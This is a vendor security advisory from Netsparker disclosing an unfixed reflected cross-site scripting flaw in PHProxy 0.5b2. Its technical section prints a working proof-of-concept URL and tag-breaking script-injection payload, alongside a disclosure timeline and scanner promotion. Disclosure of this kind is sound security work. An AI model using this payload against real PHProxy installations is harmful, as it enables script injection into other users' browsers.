Information
--------------------
Advisory by Netsparker
Name: Reflected XSS Vulnerability in PHProxy
Affected Software: PHProxy
Affected Versions: 0.5b2
Vendor Homepage: https://sourceforge.net/projects/poxy/ 
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not Fixed
Netsparker Advisory Reference: NS-17-024

Technical Details
--------------------

Proof of Concept URL for XSS vulnerability in PHProxy 0.5b2;

Proof Url /poxy-0.5b2/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0005D0)%3C/scRipt%3E
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0005D0)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
07 Feb 2017 - Issue reported.
12 June 2017 - Advisory released.

Solution
--------------------
-

Credits & Authors
--------------------
This issue has been discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

; ;